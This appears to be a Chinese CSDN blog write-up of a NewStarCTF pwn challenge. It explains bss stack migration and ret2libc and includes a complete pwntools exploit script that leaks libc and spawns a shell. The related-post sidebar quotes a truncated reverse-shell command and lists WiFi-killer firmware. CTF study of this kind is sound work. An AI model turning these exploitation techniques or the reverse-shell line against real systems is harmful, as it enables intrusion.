New-Star-Week 3-pwn stack migration revenge

已于 2023-11-22 20:34:11 修改
阅读量74 收藏
点赞数 1
分类专栏: pwn 文章标签: linux 学习
于 2023-10-31 17:01:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/134144520
版权

New-Star-Week 3-pwn stack migration revenge

开了NX和full relro

只溢出了8个字节,典型的栈迁移,这次迁移到bss段上。(以前做过的都是栈上的,特此记录。)

在这里插入图片描述

只要认真计算,可以不使用pop_rbp就完成条件。

  • 首先要栈迁移到bss段上,所以要想办法对让read往bss段里输入,这时候要直到,read对buf的确定是rbp-0x50,也就是只要第一次把rbp改成bss段(选址要找好,否则会有问题,这个放在最后谈。)一定不是因为我刚开始就选错了

  • 然后注意要跳转的地方

  • 在这里插入图片描述

  • 直接跳转到这里,不要让你亲爱的rbp跟着rsp跑了。

    第一波输入:
    在这里插入图片描述

payload = p64(bss_addr+0x100)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
payload = payload.ljust(0x50,b'A')+p64(bss_addr-0x50)+p64(leave_ret)

由于是距离rbp-0x50的地方输入,所以输入的开头位置会是bss_addr-0x50,也就是最后自己的leave会返回到输入的位置,并且把第一个输入pop给rbp(这里不能让rbp再赋予bss_addr,而是要多加一点,不能影响到)至于为什么,我再卖个关子,最后说 》__《

  • 这里接收到puts后,可以泄露libc基地址,然后再迁移打ret2libc

    payload = p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system_addr)
payload = payload.ljust(0x50,b'A')+p64(bss_addr+0x100-0x50)+p64(leave_ret)

    这里稍微解释一下吧:bss+0x100是上一次打入rbp的地址,输入地址是rbp-0x50,由于我在脚本中叫“main”的函数的最后有个leave ,所以会跳转到bss+0x100,这里刚好被写入了我输入的倒数第二个数据,使得rbp这里还有一个伪装的rbp,leave完毕后rbp变成我写的这个bss_addr+0x100-0x50,然后ret到leave_ret,将rsp挪到假rbp位置,然后pop rbp,由于rbp我不用再管了,干脆给了个0,然后继续往下执行system。

  • 第一个问题:选择bss的地址,既不能破坏原有数据,也要有足够的空间!!!!,反正最后一个页表是空的,多往下找一点,因为system在执行的时候会有扩展栈的行为,这时候就会用到相对低地址的地方,然后就失败了。

  • 第二个问题:如果再次让bss_addr作为rbp,那么你就会发现,你会把自己接下来执行的东西改掉。因为本身rsp会到到rbp-0x50+8,如果这么做,接下来的代码就变成你新添加的一部分了 会是填充的A,别问我怎么知道的,问就是干过

    总之:看着官方WP找到了自己的好多错误,还是有很多基础的东西需要补充的。

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
p=process('./pwn')
#p=remote('node4.buuoj.cn',25516)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()

pop_rdi = 0x00000000004012b3
pop_rsi_r15 = 0x00000000004012b1
leave_ret = 0x401227
ret = 0x000000000040101a
#pop_rbp = 0x000000000040115d


puts_plt = 0x401060
puts_got = 0x403FD8
main_addr = 0x4011f3
bss_addr = 0x404900
payload =b'A'*0x50+p64(bss_addr)+p64(main_addr)
gdb.attach(p)
sd(payload)
#rl()
payload = p64(bss_addr+0x100)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
payload = payload.ljust(0x50,b'A')+p64(bss_addr-0x50)+p64(leave_ret)
#gdb.attach(p)
sd(payload)
puts_addr = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))

libc=ELF('./libc.so.6')
libc_base = puts_addr -libc.sym['puts']
system_addr = libc_base +libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))
print(hex(libc_base))


payload = p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(ret)+p64(system_addr)
payload = payload.ljust(0x50,b'A')+p64(bss_addr+0x100-0x50)+p64(leave_ret)
gdb.attach(p)
sd(payload)

p.interactive()
XYYR-c
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
newstar week3 pwn
qq_62887641的博客
10-25 324
栈溢出写read函数,并且read的内容写在开辟的空间内,然后返回开辟的空间。给我们开辟了一个权限为7的空间,就是让我们写shellcode到这里。提供了一次write,和一次read,并且是超大溢出的read,通过多次栈迁移在bss段写,然后泄露libc,getshell。构造frame,溢出打srop,看exp有详细解释。发现栈里没啥libc,我们写一个libc进去。程序非常简单,溢出只能覆盖rbp和rip。多次利用这个段,多次使用。
一篇文章玩明白Stack-migration
YJ_12340的博客
08-02 329
Intel汇编,栈溢出利用,基础rop链当我们发现存在栈溢出漏洞,但是溢出字节非常小,比如0x10的时候我们就需要利用栈迁移,将栈迁移置足够大的区段去编写rop链以达到我们利用的目的。为了方便教学,这里以CTF赛题的形式进行教学。这里我用我出给自己校赛的一道题作为讲解,给出了栈的地址 这里是刚好溢出了0x10,并且给出了当前变量所处的栈地址,对于这种题目,都是直接套路杀的,而且这题没有开启canary和pie我们只需要和往常一样先编写好rop链,再利用leave命令把栈迁移到到所给的bss段或者栈地址
Pwn_8 ROP(3)——Stack Migration
weixin_30251587的博客
03-06 245
Stack Migration 栈转移 没有直接打印函数的实际地址,就自己调用puts函数。给puts函数对应的地址,可以将地址的值打印出来 函数解释 p32()主要是对整数进行打包,就是转换成二进制的形式,比如转换成地址。p32、p64是打包,u32、u64是解包。 反弹shell r.send(''bash -c "bash -i >& /dev/tcp...
NewStarCTF 2023 [WEEK 2] PWN
Xzzzz911的博客
10-15 1226
第二周题目上难度了,有几题做的比较棘手不会做>_
NewStarCTF 2023 WEEK2 pwn AK
YX-hueimie
10-17 367
最近课好多,都没啥时间打ctf了,也没有太多时间写wp惹o(╥﹏╥)o,但有人要求我肯定要满足的。
NewStarCTF 2023 WEEK3|PWN
weixin_51890658的博客
10-24 496
1.puts or system?根据名字提示把puts改为system,开了canary,但它没有用存在格式化字符串漏洞,且有n次思路:relro保护没开,可修改got表,且给了libc库,通过格式化第一次泄露got,获得system函数,第二次修改puts的got表为system即可get shellEXP:from pwn import * from LibcSearcher import * from ctypes import * sh=remote("node4.buuoj.cn",27323)
NewStarCTF 2023 [WEEK 3] PWN
Xzzzz911的博客
10-28 779
这次题目确实上了一个档次,有些东西确实也不怎么好理解,慢慢来,积少成多,相同题型放一起总结,总会得出好的结论,就一句话:多做多总结,冲冲冲!!!
[BUUCTF newstar week2] crypto/pwn/reverse
weixin_52640415的博客
10-18 815
week2
[BUUCTF NewStarCTF 2023 公开赛道] week3 crypto/pwn
weixin_52640415的博客
10-30 1111
orw, srop ,移栈, dlresolve 64位, rabin加密, 部分明文已知小e ,LCG,背包加密,AES CBC padding oracle攻击
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
系统控制和管理接口:在Linux中利用电源和性能域进行平台资源抽象
最新发布
csdnsqst0046的博客
08-09 561
在本文中,您可以了解到如何利用我们的方法将复杂性从Linux驱动程序(需要为每个平台编写不同的开发程序)转移到固件。由于固件已经适配了平台,因此固件知道需要采取哪些手段来配置外设。您可以了解我们如何定义逻辑性能和电源域,而不是单独处理每个平台资源。您还可以了解到我们如何努力实现这一目标,以及您如何进行尝试并做出贡献。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1367
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
linux 011 注释13:缺页中断,新设计艺术团队第二版,第四章 4-39 至 4-48
zhangzhangkeji的博客
08-06 210
(133) 4-42 函do_no_page。
linux docker安装 gitlab后忘记root密码如何找回
爱丫爱的博客
08-06 306
docker 安装git 忘记root 密码如何重新设置。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值